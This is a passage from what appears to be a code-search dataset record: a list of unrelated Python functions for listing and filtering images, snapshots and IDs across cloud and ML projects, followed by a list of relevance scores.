this Revision\n rev_versions = list(versions_queryset.filter(revision=rev))\n # Sort by the point number of the annotation\n rev_versions.sort( key=lambda x: anno_pks_to_pointnums[int(x.object_id)] )\n\n # Create a log entry for this Revision\n events = [\"Point {num}: {code}\".format(\n num=anno_pks_to_pointnums[int(v.object_id)],\n code=label_pks_to_codes[v.field_dict['label']],\n )\n for v in rev_versions\n ]\n if rev.comment:\n events.append(rev.comment)\n event_log.append(\n dict(\n date=rev.date_created,\n user=get_annotation_version_user_display(rev_versions[0]), # Any Version will do\n events=events,\n )\n )\n\n for access in AnnotationToolAccess.objects.filter(image=image, source=source):\n # Create a log entry for each annotation tool access\n event_str = \"Accessed annotation tool\"\n event_log.append(\n dict(\n date=access.access_date,\n user=access.user.username,\n events=[event_str],\n )\n )\n\n event_log.sort(key=lambda x: x['date'], reverse=True)\n\n return render_to_response('annotations/annotation_history.html', {\n 'source': source,\n 'image': image,\n 'metadata': image.metadata,\n 'event_log': event_log,\n },\n context_instance=RequestContext(request)\n )", "def get_volume_snapshots(self, volume):\n LOG.debug('get_volume_snapshot starts')\n pool_name = self.configuration.rbd_pool\n volume_name = 'volume-%s' % encodeutils.safe_encode(volume[\"id\"])\n snaps_on_vol = self._get_volume_snapshots(pool_name, volume_name)\n snapshots = list()\n if snaps_on_vol is not None:\n for snap in snaps_on_vol:\n snap_name = str(snap[\"name\"])\n item = dict()\n if snap_name.startswith(\"snapshot-\"):\n # snapshot directly created on volume.\n item[\"type\"] = \"volume_snap\"\n item[\"uuid\"] = snap_name[len('snapshot-'):]\n elif snap_name.startswith(\"volume-\") and \\\n snap_name.endswith(\".clone_snap\"):\n # snapshot used for create volume on volume.\n item[\"type\"] = \"clone_snap\"\n item[\"uuid\"] = snap_name[len(\"volume-\"):-len(\".clone_snap\")]\n elif snap_name.startswith(\"backup.\") and \".snap.\" in snap_name:\n # snapshot used for backup volume.\n item[\"type\"] = \"backup_snap\"\n item[\"uuid\"] = \\\n snap_name[len(\"backup.\"):snap_name.index(\".snap.\")]\n else:\n item[\"type\"] = \"\"\n item[\"uuid\"] = \"\"\n snapshots.append(item)\n\n LOG.debug('volume snapshots: %s', snapshots)\n LOG.debug('get_volume_snapshots finished.')\n return snapshots", "def list_details(ec2, image_id): # pragma: no coverage\n image = ec2.Image(image_id)\n\n def _filter_attrs(obj):\n if isinstance(obj, property) or isinstance(obj, (str, list)):\n return True\n\n for key, value in inspect.getmembers(image, predicate=_filter_attrs):\n if key.startswith(\"_\"):\n continue\n else:\n printy(key + \":\")\n pprint(value)", "def get_exploration_snapshots_metadata(exploration_id, limit):\n exploration = get_exploration_by_id(exploration_id)\n oldest_version = max(exploration.version - limit, 0) + 1\n current_version = exploration.version\n version_nums = range(current_version, oldest_version - 1, -1)\n\n return [exp_models.ExplorationSnapshotModel.get_metadata(\n exploration_id, version_num\n ) for version_num in version_nums]", "def list(self):\n r = self.target.ttbd_iface_call(\"images\", \"list\", method = \"GET\")\n return r['result']", "def get_existing_dhashes(self, img_dir):\r\n dhashes = []\r\n for img_path in Path(img_dir).glob(\"*.png\"):\r\n img = cv2.imread(str(img_path))\r\n hash = dhash.dhash_int(Image.fromarray(img), HASH_SIZE)\r\n dhashes.append(hash)\r\n\r\n return dhashes", "def 
filter_images(data, vgid2idx, meta_vgids):\r\n new_data = []\r\n for vgid in meta_vgids:\r\n new_data.append(data[vgid2idx[vgid]])\r\n return new_data", "def get_image_set_for_uid(uid: str):\n images = get_all_image_structs(uid, Config.study_size, is_accumulating=False)\n res = {'images': images}\n return res", "def _get_instance_ids(instances):\n instance_ids = []\n for instance in instances:\n instance_ids.append(instance.id)\n return instance_ids", "def snapshot_id(self) -> Optional[str]:\n return pulumi.get(self, \"snapshot_id\")", "def snapshot_id(self) -> Optional[str]:\n return pulumi.get(self, \"snapshot_id\")", "def get_ami_by_id(self, image_id):\n images = self._driver.list_images(ex_owner=self.account_id)\n image = [i for i in images if i.id == image_id][0]\n return image", "def get_image_ids(self):\n train_ids = os.listdir(self.tr_img_dir)\n test_ids = os.listdir(self.te_img_dir)\n\n ids = {\n 'train':train_ids,\n 'test':test_ids\n }\n\n return ids", "def get_snapshots(dataset=''):\n # filter my tags\n return os.listdir(dataset + ZFS_DEFAULT_SNAPSHOT_DIR)", "def get_images(self):\n \n return self.img_lst", "def get_mapping_actions(image=None, imageId=None, in_digests=[], bundle={}):\n\n if not image or not bundle:\n raise Exception(\"input error\")\n\n if not verify_policy_bundle(bundle=bundle):\n raise Exception(\"input bundle does not conform to bundle schema\")\n\n ret = []\n \n image_infos = []\n\n image_info = anchore_utils.get_all_image_info(image)\n if image_info and image_info not in image_infos:\n image_infos.append(image_info)\n\n for m in bundle['mappings']:\n polname = m['policy_id']\n wlnames = m['whitelist_ids']\n\n for image_info in image_infos:\n #_logger.info(\"IMAGE INFO: \" + str(image_info))\n ii = {}\n ii.update(image_info)\n registry = ii.pop('registry', \"N/A\")\n repo = ii.pop('repo', \"N/A\")\n\n tags = []\n fulltag = ii.pop('fulltag', \"N/A\")\n if fulltag != 'N/A':\n tinfo = anchore_utils.parse_dockerimage_string(fulltag)\n if 'tag' in tinfo and tinfo['tag']:\n tag = tinfo['tag']\n\n for t in [image, fulltag]:\n tinfo = anchore_utils.parse_dockerimage_string(t)\n if 'tag' in tinfo and tinfo['tag'] and tinfo['tag'] not in tags:\n tags.append(tinfo['tag'])\n\n digest = ii.pop('digest', \"N/A\")\n digests = [digest]\n for d in image_info['digests']:\n dinfo = anchore_utils.parse_dockerimage_string(d)\n if 'digest' in dinfo and dinfo['digest']:\n digests.append(dinfo['digest'])\n \n p_ids = []\n p_names = []\n for p in bundle['policies']:\n p_ids.append(p['id'])\n p_names.append(p['name'])\n\n wl_ids = []\n wl_names = []\n for wl in bundle['whitelists']:\n wl_ids.append(wl['id'])\n wl_names.append(wl['name'])\n \n if polname not in p_ids:\n _logger.info(\"policy not in bundle: \" + str(polname))\n continue\n\n skip=False\n for wlname in wlnames:\n if wlname not in wl_ids:\n _logger.info(\"whitelist not in bundle\" + str(wlname))\n skip=True\n if skip:\n continue\n\n mname = m['name']\n mregistry = m['registry']\n mrepo = m['repository']\n if m['image']['type'] == 'tag':\n mtag = m['image']['value']\n mdigest = None\n mimageId = None\n elif m['image']['type'] == 'digest':\n mdigest = m['image']['value']\n mtag = None\n mimageId = None\n elif m['image']['type'] == 'id':\n mimageId = m['image']['value']\n mtag = None\n mdigest = None\n else:\n mtag = mdigest = mimageId = None\n\n if registry == mregistry or mregistry == '*':\n _logger.debug(\"checking mapping for image (\"+str(image_info)+\") match.\")\n\n if repo == mrepo or mrepo == '*':\n doit = False\n 
matchstring = mname + \": N/A\"\n if tag and (mtag == '*' or mtag == tag or mtag in tags):\n matchstring = mname + \":\" + ','.join([mregistry, mrepo, mtag])\n doit = True\n elif digest and (mdigest == digest or mdigest in in_digests or mdigest in digests):\n matchstring = mname + \":\" + ','.join([mregistry, mrepo, mdigest])\n doit = True\n elif imageId and (mimageId == imageId):\n matchstring = mname + \":\" + ','.join([mregistry, mrepo, mimageId])\n doit = True\n\n matchstring = matchstring.encode('utf8')\n if doit:\n _logger.debug(\"match found for image (\"+str(matchstring)+\")\")\n\n wldata = []\n wldataset = set()\n for wlname in wlnames:\n wldataset = set(list(wldataset) + extract_whitelist_data(bundle, wlname))\n wldata = list(wldataset)\n\n poldata = extract_policy_data(bundle, polname)\n \n wlnames.sort()\n evalstr = ','.join([polname] + wlnames)\n evalhash = hashlib.md5(evalstr).hexdigest()\n ret.append( ( poldata, wldata, polname,wlnames, matchstring, m, evalhash) )\n return(ret)\n else:\n _logger.debug(\"no match found for image (\"+str(image_info)+\") match.\")\n else:\n _logger.debug(\"no match found for image (\"+str(image_info)+\") match.\")\n\n return(ret)", "def getEventIds(self):\n eventIdsLst = []\n for event in self.eventsLst:\n eventIdsLst.append(event['id'])\n return eventIdsLst", "def ListSnapshots(self):\n file_names = sorted(\n [name[:-(len(Archive._SNAP_EXT))] for name in os.listdir(self._path)\n if name.endswith(Archive._SNAP_EXT)])\n timestamps = [datetime.datetime.strptime(x, Archive._TIME_FMT)\n for x in file_names]\n return timestamps", "def GetVMSnapshotsList(self):\n try:\n current = self.vmInstance.get_current_snapshot_name()\n snapshots = self.vmInstance.get_snapshots()\n\n if current and snapshots:\n LOGGER.info('Name of current snapshot of virtual machine \"{}\": \"{}\"'.format(VM_NAME, current))\n LOGGER.info('List of all snapshots:')\n\n for i, snap in enumerate(snapshots):\n LOGGER.info(' {}. \"'.format(i + 1) + snap.get_name() + '\"')\n\n else:\n LOGGER.warning('No snapshots found for virtual machine \"{}\"!'.format(VM_NAME))\n\n except Exception as e:\n snapshots = None\n LOGGER.debug(e)\n LOGGER.error(traceback.format_exc())\n LOGGER.error('An error occured while getting list of snapshots of virtual machine \"{}\"!'.format(VM_NAME))\n\n return snapshots", "def img_filenames(self, matricule):\n proj, sid = next((proj, proj.Matricule(matricule).to('AmcStudentId'))\n for proj in self.projects_by_serie.values()\n if proj.Matricule(matricule).exists('AmcStudentId'))\n return [\n (int(num), filename.replace('%PROJET', proj.path))\n for num, filename in proj.dbs['capture'].execute('select page, src from capture_page where student=? 
order by page', [sid])\n ]", "def list(self, detailed=True, search_opts=None):\n query_string = utils.build_query_param(search_opts, sort=True)\n\n detail = \"\"\n if detailed:\n detail = \"/detail\"\n\n return self._list(\"/group_snapshots%s%s\" % (detail, query_string),\n \"group_snapshots\")", "def object_ids(self):\n return self._extract_set('id')", "def filter_images(history, whitelist):\n docker_client = docker.client.APIClient()\n local_images = common.get_local_images(docker_client)\n approved_images = set(local_images) - set(whitelist)\n return {image: timestamp for image, timestamp in history.items() if image in approved_images}", "def list_snapshots(self, detail=False, **params):\n url = 'snapshots'\n list_schema = schema.list_snapshots_no_detail\n if detail:\n url += '/detail'\n list_schema = schema.list_snapshots_with_detail\n if params:\n url += '?%s' % urllib.urlencode(params)\n\n resp, body = self.get(url)\n body = json.loads(body)\n self.validate_response(list_schema, resp, body)\n return rest_client.ResponseBody(resp, body)", "def row_uuids(self) -> list:\n return self.__row_uuids", "def _get_ids_from_ip(self, ip_address):\r\n try:\r\n # Does it look like an ip address?\r\n socket.inet_aton(ip_address)\r\n except socket.error:\r\n return []\r\n\r\n # Find the VS via ip address. First try public ip, then private\r\n results = self.list_instances(public_ip=ip_address, mask=\"id\")\r\n if results:\r\n return [result['id'] for result in results]\r\n\r\n results = self.list_instances(private_ip=ip_address, mask=\"id\")\r\n if results:\r\n return [result['id'] for result in results]", "def list_snapshots(session, verbose):\n # type: (Session, bool) -> Union[List[str], List[Dict[str,str]]]\n if not session.network:\n raise ValueError(\"Network must be set to list snapshots\")\n url_tail = \"/{}/{}/{}\".format(\n CoordConstsV2.RSC_NETWORKS, session.network, CoordConstsV2.RSC_SNAPSHOTS\n )\n return _get_list(session, url_tail, {CoordConstsV2.QP_VERBOSE: verbose})", "def snapshot_metadata(self):\n return self._snapshot_metadata", "def get_snapshots(self, region):\n try:\n conn = ec2.connect_to_region(region, **self.credentials)\n region_snapshots = conn.get_all_snapshots(owner='self')\n except boto.exception.EC2ResponseError:\n return []\n return region_snapshots", "def orthologueGeneIds(self):\n\t\tgeneIds = []\n\t\tfor geneId,row in self._dataframe.iterrows():\n\t\t\tfor item in row['Orthologue'].split(','):\t# looks like 'ENSG00003435:Gene1,ENSG00002525:Gene2' (multiple orthologues possible)\n\t\t\t\tif item.split(':')[0]: geneIds.append(item.split(':')[0])\n\t\treturn list(set(geneIds))", "def filter_images(data, split_data):\n all_split_ids = set()\n for split_name, ids in split_data.iteritems():\n all_split_ids.update(ids)\n new_data = []\n for img in data:\n keep = img['id'] in all_split_ids and len(img['regions']) > 0\n if keep:\n new_data.append(img)\n return new_data", "def servicemanage_snapshot_glance_metadata_get(context, snapshot_id, session=None):\n if not session:\n session = get_session()\n\n return session.query(models.ServiceManageGlanceMetadata).\\\n filter_by(snapshot_id=snapshot_id).\\\n filter_by(deleted=False).all()", "def image_versions(self, image_name):\n # TODO: Expand to read all tags locally, not just a fixed list\n try:\n return {\"latest\": self.image_version(image_name, \"latest\")}\n except ImageNotFoundException:\n return {}", "def screenshots(self):\n return self._screenshots", "def get_tags(self):\n tags = []\n for image in 
self.client.images.list():\n for tag in image.tags:\n if tag.startswith(self.repository_name):\n tokens = tag.split(':')\n tags.append(tokens[1])\n return tags", "def describe_snapshots(DirectoryId=None, SnapshotIds=None, NextToken=None, Limit=None):\n pass", "def list_snapshots(self, detailed=True):\n aname = \"cinder_v%s.list_snapshots\" % self.version\n with atomic.ActionTimer(self, aname):\n return (self._get_client()\n .volume_snapshots.list(detailed))", "def list_images(self):\n raise NotImplementedError()", "def list_images():\n return json_response(list_manifests())", "def get_split_vids(split_vids_path, image_set, subset='default') -> list:\n assert image_set in [\"train\", \"test\", \"val\", \"all\"]\n vid_ids = []\n sets = [image_set] if image_set != 'all' else ['train', 'test', 'val']\n for s in sets:\n vid_id_file = os.path.join(split_vids_path, subset, s + '.txt')\n with open(vid_id_file, 'rt') as fid:\n vid_ids.extend([x.strip() for x in fid.readlines()])\n\n return vid_ids" ]
[ "0.82660115", "0.6894388", "0.6246945", "0.6215981", "0.61946225", "0.60906774", "0.6078066", "0.607749", "0.5850587", "0.5829291", "0.5715038", "0.57149994", "0.5700483", "0.56884575", "0.5666648", "0.5638562", "0.56358933", "0.56192404", "0.55592096", "0.55305934", "0.5525555", "0.5520752", "0.5501659", "0.54880667", "0.5413136", "0.5403517", "0.5403517", "0.53875864", "0.5386721", "0.5364545", "0.53632647", "0.53231484", "0.5304247", "0.5293768", "0.5292942", "0.5284842", "0.5246237", "0.5243904", "0.5239223", "0.5232864", "0.52173805", "0.5216274", "0.5192146", "0.51866645", "0.51705617", "0.5170476", "0.5168298", "0.5148204", "0.5143007", "0.5122101", "0.5120914", "0.5091899", "0.5090733", "0.5085515", "0.50799763", "0.5065843", "0.50632685", "0.50427324", "0.5033", "0.5032686", "0.50302464", "0.5026262", "0.5016192", "0.5006725", "0.5005228", "0.5003699", "0.4997975", "0.49971867", "0.49952456", "0.49932796", "0.49932796", "0.49907517", "0.49879366", "0.49832353", "0.49830252", "0.49780902", "0.49734604", "0.49629018", "0.496235", "0.49572268", "0.49428836", "0.49428523", "0.49305743", "0.49292454", "0.49171397", "0.49160346", "0.49089113", "0.49087656", "0.49079278", "0.49052817", "0.49028492", "0.4902303", "0.48976517", "0.4889331", "0.48807764", "0.48785833", "0.4874758", "0.48742864", "0.48704788", "0.48686373" ]
0.8464934
0
Use dictionaries 'cos we'll have to crossreference to get snapshots that go with the AMIs returns list of dictionaries representing images from one region
def getImagesD(region): images = getImages(region) imageDicts = [] for im in images: imageDict = {"name": im.name, "id": im.id, "region": im.region.name, "state": im.state, "created": im.creationDate, "type": im.type, "KEEP": getKeepTag(im), "name_tag": get_name_tag(im), "snapshots": getSnapshotsOf(im), "description": im.description, "PROD": isProduction(im) } imageDicts.append(imageDict) return imageDicts
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getSnapshotsD(region):\n # Can a snapshot belong to more than one AMI? Dunno, keep list just in case (so it never breaks due to it)\n snapshots = getSnapshots(region)\n snapshotsDicts = []\n ims = getImages(region)\n for s in snapshots:\n amis = getAmisOf(s, ims)\n amiIds = []\n amiKeeps = []\n\n if len(amis) == 1:\n amiIds = amis[0].id.encode()\n amiKeeps = getKeepTag(amis[0])\n\n elif len(amis) == 0:\n amiIds = \"-------no-AMI-found\"\n amiKeeps = \"-------no-AMI-found\"\n else:\n for a in amis:\n amiIds.append(a.id.encode())\n amiKeeps.append(getKeepTag(a))\n\n snapshotsDict = {\"id\": s.id,\n \"status\": s.status,\n \"region\": s.region.name,\n \"progress\": s.progress,\n \"start_time\": s.start_time,\n \"volume_id\": s.volume_id,\n \"volume_size\": s.volume_size,\n \"KEEP-tag\": getKeepTag(s),\n \"Name\": get_name_tag(s),\n \"AMI(s)\": amiIds,\n \"AMI_KEEP-tags\": amiKeeps,\n \"PROD\": isProduction(s),\n \"Description\": s.description\n }\n snapshotsDicts.append(snapshotsDict)\n return snapshotsDicts", "def get_images():\n images = {}\n for k, v in DB.IMAGES.iteritems():\n images[k] = v.__dict__\n return images", "def images(self) -> dict:\n raise NotImplementedError", "def getimgs():", "def images_mapped(self):\n try:\n return dict([x for x in enumerate(self.images())])\n except:\n return None", "def populate_images(self):\n print \"Populating images info...\"\n images = self.get_all_images()\n for i in images:\n\n associated_snapshots = self.get_snapshots_of(i)\n\n self.spreadsheet[i.id] = dict(name=i.name, Name_tag=self.get_name_tag(i), id=i.id,\n KEEP_tag=self.get_keep_tag(i), PROD_tag=self.is_production(i),\n region=i.region.name,\n created=i.creationDate,\n associated_snapshots=associated_snapshots,\n description=i.description)", "def get_snapshots_of(image):\n snapshot_ids = []\n device_mapping = image.block_device_mapping # dict of devices\n devices = device_mapping.keys()\n for device in devices:\n if device_mapping[device].snapshot_id is not None:\n snapshot_ids.append(device_mapping[device].snapshot_id.encode()) # do I need to have 'encode' here?\n return snapshot_ids", "def getAmisOf(snapshot, images):\n amis = []\n for im in images:\n snapshotsOfThisIm = getSnapshotsOf(im)\n for soti in snapshotsOfThisIm:\n if soti == snapshot.id:\n amis.append(im)\n return amis", "def avail_images(call=None):\n if call == \"action\":\n raise SaltCloudSystemExit(\n \"The avail_images function must be called with \"\n \"-f or --function, or with the --list-images option\"\n )\n\n ret = {}\n conn = get_conn()\n\n for item in conn.list_images()[\"items\"]:\n image = {\"id\": item[\"id\"]}\n image.update(item[\"properties\"])\n ret[image[\"name\"]] = image\n\n return ret", "def handle_api_list_images(self, http_context):\n\n command = self.docker + ['images', '--format', '\\'{{json .}}\\'', '--no-trunc', '-a']\n images = []\n for line in subprocess.check_output(command).decode().splitlines():\n image = json.loads(line)\n image['hash'] = image['ID'].split(':')[1][:12]\n images.append(image)\n return images", "def list_images(self):\n \n logging.debug(\"list_images entered for %s\" % self.machine_name) \n snapshots = cs.list_snapshots()\n res = []\n server_id = self.cloudserver.id\n # find the one for this server\n for snapshot in snapshots:\n img = snapshot.metadata.get(\"instance_uuid\", None)\n # print img\n\n if img == server_id:\n print \"Server %s has snapshot %s\" % (server_id, img)\n res.append(img)\n\n return res", "def getSnapshotsOf(image):\n snapshotIds = []\n deviceMapping = 
image.block_device_mapping # dict of devices\n devices = deviceMapping.keys()\n for d in devices:\n snapshotId = deviceMapping[d].snapshot_id\n if snapshotId is not None:\n snapshotIds.append(snapshotId.encode())\n return snapshotIds", "def images_list(self, kwargs=None):\n\n try:\n scode, images = Rest.get('Image')\n except docker.errors.APIError as e:\n Console.error(e.explanation)\n return\n\n if len(images) == 0:\n Console.info(\"No images exist\")\n return\n\n n = 1\n e = {}\n for image in images:\n d = {}\n d['Ip'] = image['Ip']\n d['Id'] = image['Id']\n if image['RepoTags'] == None:\n d['Repository'] = image['RepoDigests'][0]\n else:\n d['Repository'] = image['RepoTags'][0]\n # d['Size'] = image['Size']\n d['Size(GB)'] = round(image['Size'] / float(1 << 30), 2) # Converting the size to GB\n e[n] = d\n n = n + 1\n Console.ok(str(Printer.dict_table(e, order=['Ip', 'Id', 'Repository', 'Size(GB)'])))", "def items(self):\n if self.__has_contents:\n return [dict(zip(['id', 'description', 'size', 'start_time', 'state'],\n [item['SnapshotId'], item['Description'], item['VolumeSize'],\n item['StartTime'], item['State']]))\n for item in self.__response['Snapshots']]\n else:\n return []", "def get_image_information(client):\n\n pipeline = [{\"$match\": {\"camera_views\": {\"$exists\": 1}}}, {\"$unwind\": {\"path\": \"$camera_views\"}}, {\"$addFields\": {\n \"camera_views.average_linear_distance\": {\n \"$divide\": [\n \"$camera_views.total_linear_distance\",\n \"$camera_views.num_entities\"\n ]\n },\n \"camera_views.average_angular_distance\": {\n \"$divide\": [\n \"$camera_views.total_angular_distance\",\n \"$camera_views.num_entities\"\n ]\n },\n \"camera_views.timestamp\": \"$timestamp\",\n \"camera_views._id\": \"$_id\",\n \"camera_views.database\": client.database.name,\n \"camera_views.collection\": client.name,\n 'camera_views.file_id':\"$camera_views.images.file_id\", #Add the Color image id for downloading and testing\n }}, {\"$replaceRoot\": {\"newRoot\": \"$camera_views\"}}, {\"$project\": {\n \"_id\": 1,\n \"num_entities\": 1,\n \"average_linear_distance\": 1,\n \"average_angular_distance\": 1,\n \"timestamp\": 1,\n \"duplicate\": 1,\n \"database\":1,\n \"collection\":1,\n \"file_id\":{\"$arrayElemAt\":[\"$images.file_id\",0]}, # Only keep the first file id (The Color image)\n }}]\n pprint.pprint(pipeline)\n result = list(client.aggregate(pipeline))\n return result", "def get_image_collection(images_directory, variant, dimensions):\n \n stains = variant.get(\"values\", [])\n primary_stain = variant.get(\"primary_value\", None) \n\n image_data = []\n\n images_directory_glob = images_directory\n if images_directory_glob[-1] != os.sep:\n images_directory_glob = images_directory_glob + os.sep\n images_directory_glob = images_directory_glob + \"*\"\n\n for image_file in glob.glob(images_directory_glob):\n file_name = os.path.basename(image_file)\n\n image_stain = None\n image_root = file_name\n for stain in stains:\n image_root = image_root.replace(stain, \"\")\n if stain in file_name:\n image_stain = stain\n\n image_dimensions = {}\n\n for key, value in dimensions.iteritems():\n if value[\"type\"] == \"String Match\":\n image_dimensions[key] = \\\n get_dimension_string_match(file_name, value.get(\"data\", []))\n elif value[\"type\"] == \"Date Parse\":\n image_dimensions[key] = get_dimension_date_parse(file_name)\n\n experiment_name = experiment.get_experiment_name(file_name)\n experiment_date = experiment.get_experiment_date(file_name)\n\n seed_source_image = file_name\n if 
primary_stain not in seed_source_image and primary_stain is not None:\n for stain in stains:\n seed_source_image = seed_source_image.replace(stain, primary_stain)\n \n image_data.append({\n \"file_name\": file_name,\n \"file_root\": image_root,\n \"stain\": image_stain, # TODO: Deprecate\n \"experiment_name\": experiment_name, # TODO: Deprecate\n \"experiment_date\": experiment_date, # TODO: Deprecate\n \"seed_source_image\": seed_source_image,\n \"variant\": image_stain,\n \"dimensions\": image_dimensions\n })\n\n return image_data", "def list_images():\n return json_response(list_manifests())", "def get_image_set_for_uid(uid: str):\n images = get_all_image_structs(uid, Config.study_size, is_accumulating=False)\n res = {'images': images}\n return res", "def detail(self, req):\n params = {\n 'filters': self._get_filters(req),\n 'limit': self._get_limit(req),\n }\n\n if 'marker' in req.str_params:\n params['marker'] = self._get_marker(req)\n\n images = db_api.image_get_all_public(None, **params)\n\n image_dicts = [make_image_dict(i) for i in images]\n return dict(images=image_dicts)", "def get_image_list(im, dic):\n lst = list(im.getdata())\n tiles = []\n for i in range(len(lst)):\n #print find_similar(lst[i], dic)[random.randrange(10)][1]\n tiles.append(find_similar(lst[i], dic)[random.randrange(10)][1])\n return tiles", "def get_objects(self, image_np: np.array,\n image: Image) -> Tuple[Dict, object]:\n pass", "def get_additional_images_downsample(widget) -> Dict[str, str]:\n images = {}\n for layer in widget.viewer.value.layers.selection:\n if layer._source.path is not None:\n images[layer._name] = str(layer._source.path)\n return images", "def getImg(img_name):\n img = Image.objects.raw({\"_id\": img_name}).first()\n in_dict = {}\n in_dict[\"name\"] = img.name\n in_dict[\"b64str\"] = img.b64str\n in_dict[\"imgsize\"] = img.imgsize\n in_dict[\"processed\"] = img.processed\n in_dict[\"timestamp\"] = img.timestamp\n return in_dict", "def getAllForImages(self):\n imageDict = {}\n for id, name in self.getAll().items():\n imageDict[id] = {}\n imageDict[id][\"name\"] = name\n imageDict[id][\"filename\"] = \"The_Steamer_Great_Western_small.jpg\"\n\n return imageDict", "def loadImagesAvatar(self): \n dictionary = {}\n dictionary[\"body\"] = None\n dictionary[\"shoes\"] = None\n dictionary[\"shirt\"] = None\n dictionary[\"trousers\"] = None\n dictionary[\"skirt\"] = None\n dictionary[\"head\"] = None\n dictionary[\"hair\"] = None\n dictionary[\"mask\"] = None\n return dictionary", "def test_get_imagelist_inmutable(self):\n images1 = self.mock_master.get_imagelist(self.region1)\n images2 = self.mock_master.get_imagelist(self.region1)\n r2dict = dict((i.id, i) for i in images2)\n self.assertEquals(images1, images2)\n self.assertNotEquals(id(images1), id(images2))\n for image in images1:\n self.assertIn(image.id, r2dict)\n image2 = r2dict[image.id]\n self.assertEquals(image, image2)\n self.assertNotEquals(id(image), id(image2))\n self.assertNotEquals(id(image.user_properties),\n id(image2.user_properties))", "def get_images(self):\r\n if self.images is None:\r\n self.images = {}\r\n for name, img_num in self.images.iteritems():\r\n if isinstance(img_num, int):\r\n yield (name, img_num)", "def getPictures (self, list) :\n\n result = []\n for event in list :\n eventEntry = {}\n eventEntry ['id'] = link = event.answer.id\n eventEntry ['time'] = event.timeOf\n eventEntry ['comments'] = event.answer.comments\n eventEntry ['location'] = self.where (event.answer)\n eventEntry ['problem'] = 
event.answer.survey ['problem_type']\n eventEntry ['pictures'] = self.pic (Picture.objects.filter (answer__id = link))\n result.append (eventEntry)\n \n return result", "def get_imgid_dict(ann):\n return {item[1][\"file_name\"]: item[0] for item in ann.imgs.items()}", "def detail(self, req):\n context = req.environ['nova.context']\n filters = self._get_filters(req)\n images = self._image_service.detail(context, filters=filters)\n images = common.limited(images, req)\n builder = self.get_builder(req).build\n return dict(images=[builder(image, detail=True) for image in images])", "def list_images(bin_lid):\n bin_url = DATA_NAMESPACE + bin_lid + '.json'\n logging.info('listing images for %s' % bin_lid)\n ds = json.loads(urllib.urlopen(bin_url).read())\n for d in ds:\n yield d['imagename']", "def detect_objects(snap):\n client = vision.ImageAnnotatorClient()\n print(snap)\n\n with open(snap, 'rb') as im_file:\n content = im_file.read()\n image = vision.Image(content=content)\n\n objects = client.object_localization(image=image).localized_object_annotations\n\n print(f\"Found {len(objects)} objects\")\n [print(f\"{objet.name} : {round(objet.score*100,2)}\") for objet in objects]\n \n return objects", "def __getitem__(self, query: BoundingBox) -> Dict[str, Any]:\n data = self._get_tensor(query)\n key = \"image\"\n sample = {key: data, \"crs\": self.crs, \"bbox\": query}\n\n return sample", "def list_images(self):\n raise NotImplementedError()", "def avail_locations(call=None):\n if call == \"action\":\n raise SaltCloudSystemExit(\n \"The avail_images function must be called with \"\n \"-f or --function, or with the --list-locations option\"\n )\n\n ret = {}\n conn = get_conn()\n\n for item in conn.list_locations()[\"items\"]:\n reg, loc = item[\"id\"].split(\"/\")\n location = {\"id\": item[\"id\"]}\n\n if reg not in ret:\n ret[reg] = {}\n\n ret[reg][loc] = location\n return ret", "def populate_snapshots(self):\n print \"Populating snapshots info...\"\n snapshots = self.get_all_snapshots()\n\n for i in snapshots:\n\n # find the ami id(s) for this snapshot. API allows for multiple even though I don't think there would be\n associated_ami_ids = self.get_amis_of(i.id)\n\n ami_keep_tags = [Ims.spreadsheet[ami_id]['KEEP_tag'] for ami_id in associated_ami_ids]\n\n self.spreadsheet[i.id] = dict(Name_tag=self.get_name_tag(i), id=i.id, KEEP_tag=self.get_keep_tag(i),\n ami_KEEP_tag=ami_keep_tags, associated_ami_ids=associated_ami_ids,\n PROD_tag=self.is_production(i), start_time=i.start_time,\n region=i.region.name, associated_volume=i.volume_id,\n volume_size=i.volume_size, description=i.description)", "def test_list_image_metadata(self):\n pass", "def get_images(self, page_number):", "def checksImages(self):\n metadata=[]\n for image in self.meta['sources']:\n with rasterio.open(image) as src:\n metaData=src.meta\n \n assert metaData['driver'] == 'GTiff', \"Driver is not supported: {0}\".format(metaData['driver'])\n assert metaData['count'] == len(self.meta['bandNames']), \"Nbands incorrect, expected: {0}, {1} provided\".format(metaData['count'],len(self.meta['bandNames']))\n \n metadata.append({'dtype': metaData['dtype'], 'driver': metaData['driver'], 'nodata': metaData['nodata'], 'nBands': metaData['count'],'crs': src.crs.to_string()})\n \n assert len(set([item['dtype'] for item in metadata])) == 1, \"Images list dtypes aren't compatibles. 
Expected: 1, {1} provided\".format(metaData['count'],len(set([item['dtype'] for item in metadata])))\n assert len(set([item['driver'] for item in metadata])) == 1, \"Images list drivers aren't compatibles. Expected: 1, 1 provided\".format(metaData['count'],len(set([item['driver'] for item in metadata])))\n assert len(set([item['nodata'] for item in metadata])) == 1, \"Images list nodata values aren't compatibles. Expected: 1, {1} provided\".format(metaData['count'],len(set([item['nodata'] for item in metadata])))\n assert len(set([item['nBands'] for item in metadata])) == 1, \"Images list nBands number aren't compatibles. Expected: 1, {1} provided\".format(metaData['count'],len(set([item['nBands'] for item in metadata])))\n assert len(set([item['crs'] for item in metadata])) == 1, \"Images list crs aren't compatibles. Expected: 1, {1} provided\".format(metaData['count'],len(set([item['crs'] for item in metadata]))) \n return metadata[0]", "def metadata2eic(url):\n logging.info('fetching image metadata from %s' % url)\n ds = json.loads(urllib.urlopen(url).read())\n fields = ['imagename','alt','pitch','roll']\n for d in ds:\n yield map(str,[d[k] for k in fields])", "def image(images):\n return images[0]", "def make_image(self, **kwargs):\n image = dict(self.BASE_EMR_IMAGE, **kwargs)\n\n return {k: v for k, v in image.items() if v is not None}", "def get_imgs_from_json(self):\n # instantiate COCO specifying the annotations json path\n # Specify a list of category names of interest\n catIds = self.coco.getCatIds(catNms=[self.categ])\n print(\"catIds: \", catIds)\n # Get the corresponding image ids and images using loadImgs\n imgIds = self.coco.getImgIds(catIds=catIds)\n images = self.coco.loadImgs(imgIds)\n print(f\"{len(images)} images in '{self.json_path}' with '{self.categ}' instances\")\n self.catIds = catIds # list\n return images", "def detail(self, req):\n context = req.environ['nova.context']\n filters = self._get_filters(req)\n page_params = common.get_pagination_params(req)\n images = self._image_service.detail(context, filters=filters,\n **page_params)\n builder = self.get_builder(req).build\n return dict(images=[builder(image, detail=True) for image in images])", "def get_metadata():\n\n metadata = []\n current_date = (datetime.date.today(),)\n\n # make sql connection\n # execute query\n with sql_cursor() as cursor:\n try:\n cursor.execute('USE goggles')\n 